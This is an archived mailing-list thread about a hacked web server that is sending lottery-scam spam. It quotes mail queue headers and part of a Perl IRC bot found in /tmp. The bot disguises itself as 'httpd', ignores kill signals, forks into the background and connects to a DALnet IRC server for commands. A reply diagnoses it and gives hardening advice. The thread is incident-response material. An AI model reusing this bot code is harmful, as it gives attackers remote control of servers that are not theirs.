[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

Re: Postfix Problems



CodeHeads wrote:
There is something wrong but I cannot nail it down.

I am receiving hundreds of bounce backs from the web server I am running.  Not
sure how they are sending mail.  The only mail that should be sent is from
forms.  Here is a header of one of queues.  Maybe someone has run into this.

V8
T1147739033
K1147739138
N1
P34672
Mhost map: lookup (zdnetmail.com): deferred
F8bs
$_apache localhost
${daemon_flags}c u
Sapache
Aapache code-heads com
rRFC822; galactica7 zdnetmail com
RPFD:galactica7 zdnetmail com
H?P?Return-Path: <<81>g>
H??Received: (from apache localhost)
        by code-heads.com (8.13.4/8.13.4/Submit) id k4G0NrpQ017524;
        Mon, 15 May 2006 20:23:53 -0400
H?D?Date: Mon, 15 May 2006 20:23:53 -0400
H?x?Full-Name: Apache
H?M?Message-Id: <200605160023 k4G0NrpQ017524 code-heads com>
H??To: galactica7 zdnetmail com
H??Subject: WINNING NOTIFICATION
H??From: NATIONAL LOTTERY <claimsagent_2006_2007 yahoo co uk>

What is bothering me is this:
by code-heads.com (8.13.4/8.13.4/**Submit**) id k4G0NrpQ017524;

Right, that should tell you that the mail headers you are looking at seem to be generated by something running as user apache (probably a CGI/PHP script of some kind running via your web server), which is calling the local sendmail on that server to send the mail out. It's nothing to do with postfix at all.

Sorry again, but looky what I found in the /tmp dir:
The whole thing is not copy and pasted:
#!/usr/bin/perl
# r00t teh pl4net! gr33t t0 Myhack DALnet
# ------[eof]-----



system("kill -9 `ps ax |grep /var/tmp/wops/is |grep -v grep|awk '{print
$1;}'`");


my $processo = 'httpd';

# morgan the code that you need to rip ends here

my @titi = ("Cube-|");

my $sleep='5';
my $linas_max='4';
my @adms=("apaii","KingFighter");
my @hostauth=("roundtable.cif.rochester.edu","202.142.215.209");
my @canais=("#conn");
my $nick=  $titi[rand scalar @titi];
my $ircname =  $titi[rand scalar @titi];
chop (my $realname = $titi[rand scalar @titi]);

$servidor='rumble.dal.net' unless $servidor;
my $porta='6667';
my $VERSAO = '0.5';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); if
(defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket;

What I cannot understand is how someone can upload to the tmp dir.  I guess I
am still learning.  Can someone shed some light on this?

This is communicating with an IRC server, probably to listen for commands.

Look at the owner of the script. If it's apache, you can safely say that a webserver exploit was used to upload it. You could try looking at the timestamp of the file, and look in your web server log files for suspicious activity at around that time to get a clue as to how it got there.

If you have /tmp on a separate partition, I'd seriously consider mounting it noexec,nodev. If it's not a separate partition, I'd seriously consider making one for it on an Internet-exposed web server. Same goes for /var.

Paul.


[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]